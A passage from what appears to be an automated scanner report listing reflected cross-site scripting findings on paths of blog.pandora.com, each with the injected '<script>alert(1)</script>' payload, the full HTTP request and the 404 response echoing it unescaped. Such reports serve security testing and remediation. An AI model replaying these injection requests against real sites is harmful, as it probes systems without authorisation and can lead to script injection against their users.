Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorabb4ba<script>alert(1)</script>cf73c74ede8/archives/2010/04/ was not found on this server.</p>
...[SNIP]...

1.232. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d94d<script>alert(1)</script>f0d1317d4a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5d94d<script>alert(1)</script>f0d1317d4a9/2010/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5d94d<script>alert(1)</script>f0d1317d4a9/2010/04/ was not found on this server.</p>
...[SNIP]...

1.233. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c7e3f<script>alert(1)</script>451f1300ac6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010c7e3f<script>alert(1)</script>451f1300ac6/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010c7e3f<script>alert(1)</script>451f1300ac6/04/ was not found on this server.</p>
...[SNIP]...

1.234. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb7b3<script>alert(1)</script>c9a6d62cd0b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/04cb7b3<script>alert(1)</script>c9a6d62cd0b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/04cb7b3<script>alert(1)</script>c9a6d62cd0b/ was not found on this server.</p>
...[SNIP]...

1.235. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5cc96<script>alert(1)</script>7c02a0cfd8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora5cc96<script>alert(1)</script>7c02a0cfd8a/archives/2010/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora5cc96<script>alert(1)</script>7c02a0cfd8a/archives/2010/06/ was not found on this server.</p>
...[SNIP]...

1.236. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d407f<script>alert(1)</script>90eda7c143c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesd407f<script>alert(1)</script>90eda7c143c/2010/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesd407f<script>alert(1)</script>90eda7c143c/2010/06/ was not found on this server.</p>
...[SNIP]...

1.237. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff848<script>alert(1)</script>e2df3910455 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010ff848<script>alert(1)</script>e2df3910455/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010ff848<script>alert(1)</script>e2df3910455/06/ was not found on this server.</p>
...[SNIP]...

1.238. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload edb24<script>alert(1)</script>4f85795b56c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/06edb24<script>alert(1)</script>4f85795b56c/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/06edb24<script>alert(1)</script>4f85795b56c/ was not found on this server.</p>
...[SNIP]...

1.239. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d931d<script>alert(1)</script>e8c0ddecb85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorad931d<script>alert(1)</script>e8c0ddecb85/archives/2010/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad931d<script>alert(1)</script>e8c0ddecb85/archives/2010/08/ was not found on this server.</p>
...[SNIP]...

1.240. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b9c8<script>alert(1)</script>2807d91ee1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives1b9c8<script>alert(1)</script>2807d91ee1e/2010/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives1b9c8<script>alert(1)</script>2807d91ee1e/2010/08/ was not found on this server.</p>
...[SNIP]...

1.241. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e09c9<script>alert(1)</script>d41b3d7ead was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010e09c9<script>alert(1)</script>d41b3d7ead/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010e09c9<script>alert(1)</script>d41b3d7ead/08/ was not found on this server.</p>
...[SNIP]...

1.242. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b6267<script>alert(1)</script>bcd7c444884 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/08b6267<script>alert(1)</script>bcd7c444884/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/08b6267<script>alert(1)</script>bcd7c444884/ was not found on this server.</p>
...[SNIP]...

1.243. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/08/be-part-of-a-pa.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c939<script>alert(1)</script>b06104d0963 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora9c939<script>alert(1)</script>b06104d0963/archives/2010/08/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9c939<script>alert(1)</script>b06104d0963/archives/2010/08/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...

1.244. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/08/be-part-of-a-pa.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b40c4<script>alert(1)</script>474a0312c0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesb40c4<script>alert(1)</script>474a0312c0d/2010/08/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesb40c4<script>alert(1)</script>474a0312c0d/2010/08/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...

1.245. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/08/be-part-of-a-pa.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aa222<script>alert(1)</script>1c5a4ab29c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010aa222<script>alert(1)</script>1c5a4ab29c9/08/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010aa222<script>alert(1)</script>1c5a4ab29c9/08/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...

1.246. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/08/be-part-of-a-pa.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79622<script>alert(1)</script>2b965e1ed52 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/0879622<script>alert(1)</script>2b965e1ed52/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0879622<script>alert(1)</script>2b965e1ed52/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...

1.247. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/08/be-part-of-a-pa.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 39457<script>alert(1)</script>8f9246aff15 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/08/be-part-of-a-pa.html39457<script>alert(1)</script>8f9246aff15 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/08/be-part-of-a-pa.html39457<script>alert(1)</script>8f9246aff15 was not found on this server.</p>
...[SNIP]...

1.248. http://blog.pandora.com/pandora/archives/2010/09/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92883<script>alert(1)</script>ae77c2b93bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

